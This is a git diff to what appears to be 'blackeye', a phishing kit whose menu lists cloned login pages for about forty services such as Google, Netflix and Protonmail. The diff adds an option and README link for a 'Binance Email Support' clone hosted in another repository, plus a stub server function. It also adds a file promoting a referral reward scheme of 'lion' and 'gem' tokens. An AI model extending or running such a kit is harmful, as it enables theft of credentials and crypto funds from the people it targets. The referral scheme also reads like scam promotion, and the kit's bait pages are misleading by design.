diff --git "a/Athene Lion\360\237\246\201 Shares" "b/Athene Lion\360\237\246\201 Shares" new file mode 100644 index 0000000..d03fb91 --- /dev/null +++ "b/Athene Lion\360\237\246\201 Shares" @@ -0,0 +1,3 @@ +Get 15000 lion on your level criteria +Get 1000 gem if u have refferd atleast two people in your network +Share after you have successfully received yours diff --git a/README.md b/README.md index 3e06a95..d1fefab 100644 --- a/README.md +++ b/README.md @@ -11,6 +11,8 @@ ![alt text](https://raw.githubusercontent.com/EricksonAtHome/blackeye/main/img/bankofa.png) +[New Binance Email Support Clone for BLACKEYE v3.1 ](https://github.com/EricksonAtHome/bes) + ### UPDATES : ##### UPDATES_TMP websites : @@ -21,7 +23,8 @@ [05] Github [21] GitLab [37] Netflix [06] Google [22] Twitch [38] Reddit [07] Origin [23] MySpace [39] StackOverflow - [08] Yahoo [24] Badoo [40] Custom + [08] Yahoo [24] Badoo [40] Custom + [41] Binance Email Support [09] Linkedin [25] VK [10] Protonmail [26] Yandex [11] Wordpress [27] devianART @@ -59,7 +62,7 @@ cd blackeye bash blackeye.sh ``` -![alt text](https://raw.githubusercontent.com/EricksonAtHome/blackeye/main/img/hiws.png) +![alt text](https://raw.githubusercontent.com/EricksonAtHome/blackeye/main/img/hiws2.png) ### Donate! @EricksonHolding Donate And Support: diff --git a/blackeye.sh b/blackeye.sh index 599ea9a..3778149 100644 --- a/blackeye.sh +++ b/blackeye.sh @@ -1,5 +1,16 @@ #!/bin/bash +open_page() { + url="https://github.com/EricksonAtHome/bes" + open "$url" +} + +start_server() { + server=$1 + # Start de server + echo "Start de server voor: $server" +} + # Upgraded by: @EricksonAtHome (https://github.com/EricksonAtHome/blackeye) #Enhanced ngrok tunnelling trap 'printf "\n";stop;exit 1' 2 @@ -21,6 +32,7 @@ printf " \e[1;92m[\e[0m\e[1;77m13\e[0m\e[1;92m]\e[0m\e[1;91m IGFollower printf " \e[1;92m[\e[0m\e[1;77m14\e[0m\e[1;92m]\e[0m\e[1;91m Pinterest\e[0m \e[1;92m[\e[0m\e[1;77m30\e[0m\e[1;92m]\e[0m\e[1;91m Steam \e[0m \n" printf " \e[1;92m[\e[0m\e[1;77m15\e[0m\e[1;92m]\e[0m\e[1;91m Apple ID\e[0m \e[1;92m[\e[0m\e[1;77m31\e[0m\e[1;92m]\e[0m\e[1;91m Tiktok \e[0m \n" printf " \e[1;92m[\e[0m\e[1;77m16\e[0m\e[1;92m]\e[0m\e[1;91m Verizon\e[0m \e[1;92m[\e[0m\e[1;77m32\e[0m\e[1;92m]\e[0m\e[1;91m Playstation \e[0m \e[1;94m \n" +printf " \e[1;92m[\e[0m\e[1;77m41\e[0m\e[1;92m]\e[0m\e[1;91m Binance Email Support \e[0m \e[1;94m \n" read -p $'\n\e[1;92m\e[0m\e[1;77m\e[0m\e[1;92m ┌─[ Choose an option:]─[~] @@ -185,6 +197,10 @@ server="create" createpage start +elif [[ $option == 41 ]]; then + open_page + + else printf "\e[1;93m [!] Invalid option!\e[0m\n" menu diff --git a/img/hiws.png b/img/hiws.png index 86f707b..aa13d2a 100644 Binary files a/img/hiws.png and b/img/hiws.png differ diff --git a/img/hiws2.png b/img/hiws2.png new file mode 100644 index 0000000..aa13d2a Binary files /dev/null and b/img/hiws2.png differ